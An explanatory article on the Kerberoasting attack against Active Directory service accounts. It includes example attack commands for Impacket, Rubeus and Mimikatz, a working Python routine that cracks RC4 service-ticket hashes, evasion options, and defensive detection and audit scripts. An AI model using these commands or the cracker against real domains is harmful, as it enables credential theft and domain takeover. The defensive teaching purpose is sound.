Kerberoasting, a term that comes up often in discussions of post-exploitation, is a technique attackers use to obtain crackable credential material for an Active Directory (AD) account that has a servicePrincipalName (SPN) set. It abuses legitimate behaviour of the Kerberos authentication protocol rather than a software bug: any authenticated domain user can request a service ticket for any registered SPN, and that ticket is encrypted with a key derived from the service account's password. Because a single cracked service account is frequently enough to compromise a domain, the technique has drawn sustained attention from defenders. This article explains how Kerberoasting works, the tools commonly used to carry it out, and detection and mitigation strategies.
The Basics of Kerberoasting
Kerberoasting abuses a design property of the Kerberos protocol rather than a flaw in its implementation. In Active Directory, Service Principal Names (SPNs) are unique identifiers for each instance of a service, and a client locates the key it must use for a service by its SPN. SPNs are registered on user or computer accounts; a user account with an SPN that runs a service or application is commonly called a service account. Such accounts should be granted only the privileges their service needs, but in practice they are often over-privileged and carry long-lived, human-chosen passwords, which is what makes the technique worthwhile. Computer accounts also carry SPNs, but their passwords are long, random and rotated automatically, so the attack targets user accounts with SPNs.
The attacker does not need to modify anything, and does not need elevated privileges. Using any valid domain credentials, they enumerate accounts that have an SPN through an LDAP query (for example (&(objectCategory=user)(servicePrincipalName=*))) and then ask the Key Distribution Center (KDC) for a Ticket Granting Service (TGS) ticket for each SPN. The KDC issues the ticket without checking whether the requester is authorised to use the service, because enforcing access control is the service's job. The ticket inside the TGS-REP is encrypted with the service account's long-term key; for RC4-HMAC (encryption type 23, shown as 0x17 in the event log) that key is simply the NT hash of the account's password, which is why attackers request RC4 tickets whenever the account permits them. That encrypted blob is the target.
Extraction of TGS Tickets
Obtaining the TGS ticket is the crux of a Kerberoasting attack. The attacker does not receive the password hash directly; they receive ciphertext and a checksum that were produced with a key derived from the password. Because the key derivation and the encryption are deterministic, a candidate password can be tested entirely offline: derive the key, decrypt the ticket and verify the checksum. The tools described below write each ticket in a crackable form such as hashcat's $krb5tgs$23$ format (mode 13100) or the krb5tgs format understood by John the Ripper, so the brute-force or dictionary attack can run on dedicated hardware with no further contact with the domain.
Tools and Techniques for Conducting a Kerberoasting Attack
While many tools can be used to execute Kerberoasting, Mimikatz, Impacket, and Rubeus are commonly employed by attackers. These tools simplify the attack process by automating key steps and extracting necessary data.
Mimikatz
Mimikatz, perhaps the best-known post-exploitation tool, is usually associated with pulling credentials out of LSASS memory, but that is a separate capability and Kerberoasting does not need it. For roasting, an operator with valid domain credentials uses kerberos::ask /target:<SPN> to request a service ticket for a given SPN, then kerberos::list /export to write the cached tickets to .kirbi files on disk. The exported ticket is converted into a crackable hash with a helper such as John the Ripper's kirbi2john script or the tgsrepcrack script from the original kerberoast toolkit.
Impacket
Impacket's GetUserSPNs.py performs the whole attack from any host that can reach LDAP and the KDC, including a non-domain-joined Linux machine. It queries LDAP for user accounts with an SPN, requests a service ticket for each when run with -request, and prints the results in hashcat/John format (-outputfile writes them to a file), for example: GetUserSPNs.py corp.local/jdoe:'Passw0rd' -dc-ip 10.0.0.5 -request -outputfile kerberoast.txt. Because it needs nothing more than a domain user's credentials and network access, it is the usual choice when the attacker is not operating on a domain-joined Windows host.
Rubeus
Rubeus is a C# toolkit for Kerberos abuse that is typically run from a compromised domain-joined Windows host. Its kerberoast action enumerates accounts with SPNs via LDAP, requests a service ticket for each and writes the results in hashcat format (Rubeus.exe kerberoast /outfile:hashes.txt); it does not extract anything from memory. Two options matter from a defensive standpoint: /rc4opsec restricts the requests to accounts that do not support AES, so that no RC4 ticket is issued for an AES-capable account and the downgrade never appears in the logs, and /tgtdeleg lets Rubeus obtain a usable TGT for the current user without knowing that user's plaintext password. The gathered hashes are then cracked offline, relying on the service account's password being weak.
Offline Password Cracking: The Crux of Kerberoasting
With the ticket in hand, the adversary runs an offline cracking attack to recover the plaintext password. The cracking phase sends no traffic to Active Directory, so the domain cannot see it; the ticket requests that precede it, however, are recorded by the KDC, which is what the detection section below relies on. Speed depends on the encryption type. For an RC4-HMAC ticket the key is a single MD4 of the UTF-16LE password, so a GPU tests hundreds of millions of candidates per second; for an AES ticket (hashcat modes 19600 and 19700) the key is derived with PBKDF2 using 4096 iterations, which is orders of magnitude slower and is one reason to force AES on service accounts.
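To make the offline step concrete, the following added example (written for this article, not code from any of the tools named above) reproduces what hashcat mode 13100 does. It implements the RC4-HMAC encryption of RFC 4757 and MD4 in pure Python, acts as the KDC to encrypt a constructed ticket body for a hypothetical service account svc_sql under a weak password, emits the blob in the $krb5tgs$23$ line format, and then cracks that line with a small constructed wordlist without touching any KDC. The account, realm, SPN, password and wordlist are all assumptions; the ticket body is a placeholder rather than real ASN.1.

```python
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often absent under OpenSSL 3."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK
    # Message-word order for rounds 2 and 3 (round 1 uses words 0..15 in order).
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(48):
            if i < 16:
                f, k, s, add = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                f, k, s, add = (b & c) | (b & d) | (c & d), r2[i - 16], (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                f, k, s, add = b ^ c ^ d, r3[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, rotl((a + f + x[k] + add) & MASK, s), b, c
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC long-term key is the NT hash: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


KEY_USAGE_TICKET = 2  # key usage number for the encrypted part of a service ticket


def rc4_hmac_encrypt(key, plaintext, usage=KEY_USAGE_TICKET, confounder=None):
    """RFC 4757: returns (checksum, edata) as they appear in the TGS-REP ticket."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    conf = confounder or os.urandom(8)
    checksum = hmac.new(k1, conf + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, conf + plaintext)


def hashcat_line(user, realm, spn, checksum, edata):
    """hashcat 13100 / John krb5tgs line, the form Rubeus and GetUserSPNs.py emit."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def crack(line, wordlist, usage=KEY_USAGE_TICKET):
    """Offline check per candidate: derive key, decrypt, verify HMAC. No KDC contact."""
    _, checksum_hex, edata_hex = line.rsplit("$", 2)
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    for candidate in wordlist:
        k1 = hmac.new(nt_hash(candidate), struct.pack("<I", usage), hashlib.md5).digest()
        k3 = hmac.new(k1, checksum, hashlib.md5).digest()
        plain = rc4(k3, edata)  # confounder || ticket body if the key is right
        if hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum):
            return candidate
    return None


# Constructed scenario (hypothetical account, realm, SPN and password).
SERVICE_PASSWORD = "Summer2023!"
TICKET = hashcat_line(
    "svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433",
    *rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), b"constructed EncTicketPart for cname=jdoe"),
)
WORDLIST = ["password", "Welcome1", "Summer2023!", "Winter2023!"]  # constructed

if __name__ == "__main__":
    print(TICKET)
    print("cracked:", crack(TICKET, WORDLIST))
```

The check in crack is exactly why the attack works offline: everything needed to test a guess (the key usage constant, the checksum and the ciphertext) is in the ticket, and the service account's key is a function of its password alone. An AES ticket differs only in that the key comes from PBKDF2 and the cipher is AES-CTS, which changes the cost per guess but not the principle.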
Using Cracked Passwords to Further Objectives
Once the password is cracked, the attacker can authenticate as the service account and use its privileges to further their objectives: exfiltrating data, moving laterally to the servers that run the service, or escalating privileges. Service accounts are frequently local administrators on those servers, members of privileged groups or configured for delegation, so a single cracked password is often enough to reach domain-level control.
Detecting Kerberoasting Attacks
Detection relies on the Security event log of the domain controllers, specifically the service-ticket request events the KDC writes. Taken one at a time these requests look like ordinary Kerberos traffic; what distinguishes Kerberoasting is the pattern: a single user account requesting tickets for many distinct SPNs in a short window, tickets requested with the RC4-HMAC encryption type (0x17) in a domain that otherwise issues AES tickets, and tickets for services the user never actually connects to. A honeytoken account with a plausible SPN and no real service behind it is a high-fidelity complement, because nothing legitimate should ever request a ticket for it.
Windows Event ID 4769
Windows Event ID 4769 (A Kerberos service ticket was requested) is logged on the domain controller for every TGS request the KDC receives, provided the Audit Kerberos Service Ticket Operations subcategory is enabled. The useful fields are Account Name (the requester), Service Name (the account the SPN is registered on), Client Address, Ticket Encryption Type (0x17 is RC4-HMAC, 0x11 and 0x12 are AES128 and AES256) and Failure Code. Because every access to every service produces one, the volume is high; filter out the krbtgt service and computer accounts (names ending in $) before looking for the pattern, and treat an RC4 ticket for an account that normally receives AES tickets as a strong signal of a deliberate downgrade.
Windows Event ID 4770
Windows Event ID 4770 (A Kerberos service ticket was renewed) records the renewal of an existing ticket rather than a new request. A Kerberoasting attacker only wants the ciphertext and never renews the tickets it collects, so 4770 offers far less direct signal than 4769; it is mainly useful as context when reconstructing what a compromised account did with a ticket afterwards.
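The rules above, applied to log data, as an added example written for this article rather than any vendor's detection content. It runs over a constructed sample of 4769 events (already reduced to the fields named above; the XML or JSON parsing step is outside the example) and raises three kinds of alert: a request for a hypothetical honeytoken account, an RC4 ticket for a service that is seen receiving AES tickets elsewhere in the data, and one account requesting tickets for four or more distinct services within five minutes. The account names, thresholds and the honeytoken name are assumptions to tune for a real environment; in production the AES baseline should come from history, not from the same batch being scored.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4769 events (Account Name, Service Name, Ticket Encryption Type).
EVENTS = [
    {"time": "2024-03-04T09:12:01", "account": "jdoe@CORP.LOCAL", "service": "SQL01$", "etype": "0x12"},
    {"time": "2024-03-04T09:12:05", "account": "jdoe@CORP.LOCAL", "service": "krbtgt", "etype": "0x12"},
    {"time": "2024-03-04T09:30:00", "account": "jdoe@CORP.LOCAL", "service": "svc_sql", "etype": "0x17"},
    {"time": "2024-03-04T09:30:01", "account": "jdoe@CORP.LOCAL", "service": "svc_web", "etype": "0x17"},
    {"time": "2024-03-04T09:30:01", "account": "jdoe@CORP.LOCAL", "service": "svc_backup", "etype": "0x17"},
    {"time": "2024-03-04T09:30:02", "account": "jdoe@CORP.LOCAL", "service": "svc_honey", "etype": "0x17"},
    {"time": "2024-03-04T09:30:02", "account": "jdoe@CORP.LOCAL", "service": "svc_sap", "etype": "0x17"},
    {"time": "2024-03-04T10:00:00", "account": "asmith@CORP.LOCAL", "service": "svc_sql", "etype": "0x12"},
    {"time": "2024-03-04T11:00:00", "account": "asmith@CORP.LOCAL", "service": "svc_web", "etype": "0x12"},
]

HONEY_ACCOUNTS = {"svc_honey"}   # hypothetical honeytoken SPN account with no real service
WINDOW = timedelta(minutes=5)    # assumed tuning values
BURST_THRESHOLD = 4
AES_ETYPES = {"0x11", "0x12"}
RC4_ETYPE = "0x17"


def is_noise(ev):
    """Drop the bulk of 4769 volume: TGT traffic via krbtgt and machine accounts."""
    return (ev["service"].lower() == "krbtgt" or ev["service"].endswith("$")
            or ev["account"].split("@")[0].endswith("$"))


def detect(events, honey_accounts=HONEY_ACCOUNTS):
    """Return (rule, requesting account, detail) tuples for suspicious 4769 patterns."""
    events = sorted(events, key=lambda e: e["time"])
    # Services that receive AES tickets: an RC4 ticket for one of them is a downgrade.
    aes_baseline = {e["service"] for e in events if e["etype"] in AES_ETYPES}
    alerts = []
    recent_by_account = defaultdict(list)   # account -> [(time, service)] inside WINDOW
    burst_reported = set()
    for ev in events:
        if is_noise(ev):
            continue
        t = datetime.fromisoformat(ev["time"])
        if ev["service"] in honey_accounts:
            alerts.append(("honeytoken", ev["account"], ev["service"]))
        if ev["etype"] == RC4_ETYPE and ev["service"] in aes_baseline:
            alerts.append(("rc4_downgrade", ev["account"], ev["service"]))
        recent = [(ts, s) for ts, s in recent_by_account[ev["account"]] if t - ts <= WINDOW]
        recent.append((t, ev["service"]))
        recent_by_account[ev["account"]] = recent
        distinct = {s for _, s in recent}
        if len(distinct) >= BURST_THRESHOLD and ev["account"] not in burst_reported:
            burst_reported.add(ev["account"])
            alerts.append(("spn_burst", ev["account"], sorted(distinct)))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

In the sample, jdoe's ordinary traffic (a ticket for the SQL01$ computer account and a krbtgt request) is discarded, while the run of RC4 requests at 09:30 produces two downgrade alerts (svc_sql and svc_web normally get AES tickets), a honeytoken alert and a burst alert; asmith, who uses two services an hour apart with AES, produces nothing.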
Mitigating Kerberoasting Attacks: Best Practices
Several measures reduce exposure, and they work best in combination. The most effective is to remove the weak password that the attack depends on: migrate services to Group Managed Service Accounts (gMSA), whose passwords are long, random and rotated automatically by AD, and give any remaining user-based service account a randomly generated password of 25 or more characters that is rotated on a schedule. Next, deny the RC4 downgrade by setting msDS-SupportedEncryptionTypes on each service account to AES only (0x18, AES128 plus AES256); the KDC then refuses to issue an RC4-encrypted ticket for that account, any ticket an attacker does obtain must be cracked against a PBKDF2-derived AES key, and any remaining 0x17 tickets in the 4769 log stand out. Audit which accounts carry an SPN, remove SPNs that no longer serve a purpose, and keep SPN-bearing accounts out of privileged groups so that a cracked password does not hand over the domain. A honeytoken account with a realistic SPN and no real service gives a high-fidelity alert. Kerberos Flexible Authentication Secure Tunneling (FAST, also called Kerberos armoring) is often listed alongside these: the policy that fails authentication requests when armoring is not available hardens the initial AS exchange, but it does not stop an authenticated domain user from requesting service tickets, so it complements rather than replaces the measures above.
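The account-level checks above, as an added audit example written for this article (not a Microsoft or vendor tool). It takes a constructed export of the attributes an administrator would pull for every account that has an SPN (sAMAccountName, objectClass, msDS-SupportedEncryptionTypes, pwdLastSet, memberOf, adminCount), skips gMSAs, and reports which accounts still allow RC4, have a stale password or sit in a privileged group. The encryption-type bit values are the documented ones; the password-age limit and the group list are assumptions, as is the conservative choice to treat an unset msDS-SupportedEncryptionTypes as RC4-capable, since the KDC's default in that case depends on domain controller patch level.

```python
from datetime import datetime

# Bit flags of msDS-SupportedEncryptionTypes.
DES_CRC, DES_MD5, RC4_HMAC, AES128, AES256 = 0x1, 0x2, 0x4, 0x8, 0x10
AES_ONLY = AES128 | AES256  # 0x18, the value to set on a hardened service account

# Assumed policy values for this audit.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators",
                     "Account Operators", "Backup Operators", "Schema Admins"}
MAX_PASSWORD_AGE_DAYS = 365

# Constructed export of SPN-bearing accounts (hypothetical names and values).
ACCOUNTS = [
    {"sAMAccountName": "svc_sql", "objectClass": "user", "msDS-SupportedEncryptionTypes": None,
     "pwdLastSet": "2019-06-01", "memberOf": ["Domain Admins"], "adminCount": 1},
    {"sAMAccountName": "svc_web", "objectClass": "user", "msDS-SupportedEncryptionTypes": AES_ONLY,
     "pwdLastSet": "2024-01-15", "memberOf": [], "adminCount": 0},
    {"sAMAccountName": "svc_backup", "objectClass": "user",
     "msDS-SupportedEncryptionTypes": RC4_HMAC | AES_ONLY,
     "pwdLastSet": "2023-09-01", "memberOf": ["Backup Operators"], "adminCount": 1},
    {"sAMAccountName": "gmsa_iis$", "objectClass": "msDS-GroupManagedServiceAccount",
     "msDS-SupportedEncryptionTypes": AES_ONLY, "pwdLastSet": "2024-02-20", "memberOf": []},
]


def rc4_allowed(enctypes):
    """Unset or 0 is treated as RC4-capable (conservative assumption, see lead-in)."""
    return not enctypes or bool(enctypes & RC4_HMAC)


def audit(accounts, now):
    """Map each risky account name to the list of issues found on it."""
    findings = {}
    for acct in accounts:
        if acct["objectClass"] == "msDS-GroupManagedServiceAccount":
            continue  # random, automatically rotated password: not a useful roasting target
        issues = []
        if rc4_allowed(acct.get("msDS-SupportedEncryptionTypes")):
            issues.append("rc4_allowed")
        age = (now - datetime.fromisoformat(acct["pwdLastSet"])).days
        if age > MAX_PASSWORD_AGE_DAYS:
            issues.append(f"password_age_{age}d")
        if set(acct.get("memberOf", [])) & PRIVILEGED_GROUPS or acct.get("adminCount") == 1:
            issues.append("privileged")
        if issues:
            findings[acct["sAMAccountName"]] = issues
    return findings


if __name__ == "__main__":
    for name, issues in audit(ACCOUNTS, datetime(2024, 3, 4)).items():
        print(name, issues)
```

An account that shows all three issues, like svc_sql in the sample, is the worst case this article describes: RC4 tickets can be requested for it, its password has not changed in years, and cracking it yields Domain Admins. svc_web, which is AES-only with a recent password and no group membership, produces no finding.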
Conclusion
Understanding how a Kerberoasting attack works, what it needs (nothing more than a domain user and an SPN whose account has a guessable password) and which tools carry it out is what makes detection and mitigation effective. Monitoring Event ID 4769 on domain controllers for one account requesting tickets for many services, for RC4 tickets in an AES domain and for requests against a honeytoken SPN surfaces the attack at the only point where it touches the domain. Removing weak service-account passwords through gMSAs and long random credentials, forcing AES on service accounts, pruning unnecessary SPNs and privileges, and treating Kerberos armoring (FAST) as a supplementary hardening step rather than a fix, together remove most of what the attacker relies on.